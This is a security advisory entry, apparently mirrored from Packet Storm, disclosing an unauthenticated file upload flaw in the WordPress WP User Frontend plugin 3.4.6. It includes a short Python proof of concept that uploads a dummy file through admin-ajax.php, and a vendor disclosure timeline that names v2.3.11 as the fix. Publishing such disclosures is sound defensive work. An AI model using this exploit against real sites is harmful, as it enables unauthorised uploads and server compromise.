Lucene search
K

WordPress WP User Frontend 3.4.6 File Upload

🗓️ 09 Feb 2016 00:00:00Reported by panVagenasType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

WordPress WP User Frontend Plugin unrestricted file upload vulnerability discovered and exploited. Attacker can upload any file without privilege. Vendor patched in v2.3.11

Code
`* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File  
Upload]  
* Discovery Date: 2016-02-04  
* Public Disclosure: 2016-02-08  
* Exploit Author: Panagiotis Vagenas  
* Contact: https://twitter.com/panVagenas  
* Vendor Homepage: https://wedevs.com  
* Software Link: https://wordpress.org/plugins/wp-user-frontend  
* Version: 3.4.6  
* Tested on: WordPress 4.4.2  
* Category: WebApps, WordPress  
  
  
Description  
-----------  
  
WordPress plugin _WP User Frontend_ suffers from an unrestricted file  
uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or  
`wpuf_insert_image` actions to upload any file which pass the WordPress  
mime and size checks.  
  
The attack does not require any privilege to be performed. The mentioned  
actions are available to non-privileged users also, thus allowing to  
anyone uploading files to the web server.  
  
PoC  
---  
  
  
```  
#!/usr/bin/python3  
  
################################################################################  
# WP User Frontend unrestricted file upload exploit  
#  
# Author: Panagiotis Vagenas <[email protected]>  
################################################################################  
  
import requests  
import tempfile  
  
url = 'http://example.com/wp-admin/admin-ajax.php'  
  
postData = {  
'action': 'wpuf_file_upload'  
}  
  
file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')  
  
file.write('A'*32)  
  
file.seek(0)  
  
files = {'wpuf_file': file}  
  
r = requests.post(url, data=postData, files=files)  
  
file.close()  
  
if r.text != 'error':  
print('Success!')  
print(r.text)  
else:  
print('error')  
  
exit(0)  
  
```  
  
Timeline  
--------  
  
1. **2016-02-04**: Vendor notified via support forums in WordPress.org  
2. **2016-02-05**: Vendor responded  
3. **2016-02-05**: Issue details send to vendor  
4. **2016-02-06**: Requested CVE ID  
5. **2016-02-06**: Vendor implemented security checks  
6. **2016-02-06**: Verified that this exploit is no longer valid  
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation